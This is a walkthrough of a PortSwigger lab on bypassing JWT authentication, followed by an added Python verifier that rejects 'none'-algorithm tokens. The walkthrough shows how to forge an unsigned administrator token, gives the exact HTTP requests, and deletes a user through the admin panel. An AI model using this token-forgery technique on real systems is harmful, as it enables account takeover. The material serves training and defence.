JWT authentication bypass via flawed signature verification
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification
Description
This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.
To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Solution

Go to the login page and log in as the wiener user.
The JWT extension reveals that the session cookie is a JWT, clearly tied to the wiener account:

{"iss":"portswigger","exp":1742670990,"sub":"wiener"}
Send the request to Repeater and select the JSON Web Token tab to inspect the token.

In the JSON Web Token tab, change the sub claim to "administrator" and set the header's alg to "none".

Then go back to the Pretty tab, change the id parameter to administrator (GET /my-account?id=administrator HTTP/2)
and delete the signature of the session cookie (the last segment after the final dot):

GET /my-account?id=administrator HTTP/2
Host: 0a1f00cf0301c91183362366006a000a.web-security-academy.net
Cookie: session=eyJraWQiOiJlMmNlOWNjNC0yNWNiLTRmNjAtYjcyMS05M2FlYjYyMWI2NTMiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY3Mzg5OCwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.
Click Send, then Follow redirection.

Now we're authenticated as administrator!
Checking the response, the admin panel's path is /admin,

so we can move there with a GET request: GET /admin HTTP/2

Analyzing the response, we see that the request that deletes the user carlos is: GET /admin/delete?username=carlos HTTP/2

So click Send and then Follow redirection to delete the user and complete the lab.
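From the defender's side, the root cause is a verifier that lets the token's own alg header decide whether the signature is checked at all. The following Python example is added here and is not part of the lab or this writeup: a minimal HS256 verifier that enforces a server-side algorithm allowlist, so an "alg": "none" token with an empty signature segment (like the cookie above) is rejected before any claim is trusted. The secret is a constructed test value.

```python
import base64
import hashlib
import hmac
import json
import time

# Server-side policy: the verifier, not the token, decides which algorithms
# are acceptable; "none" is never on this list.
ALLOWED_ALGS = frozenset({"HS256"})


def _b64url_decode(segment):
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def make_hs256_token(claims, secret):
    """Issue a token the way the server should: HS256 over header.payload."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_jwt(token, secret, now=None):
    """Return the claims only if the token is well-formed, uses an allowed
    algorithm, carries a valid HMAC and has not expired; raise ValueError otherwise."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    # Reject "alg": "none" (and anything else not on the allowlist) before even
    # looking at the signature; an empty third segment never counts as valid.
    if header.get("alg") not in ALLOWED_ALGS:
        raise ValueError(f"algorithm not allowed: {header.get('alg')!r}")
    # HS256 is the only allowed algorithm, so an HMAC-SHA256 check is the right one.
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    if int(claims.get("exp", 0)) <= (now if now is not None else int(time.time())):
        raise ValueError("token expired")
    return claims
```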
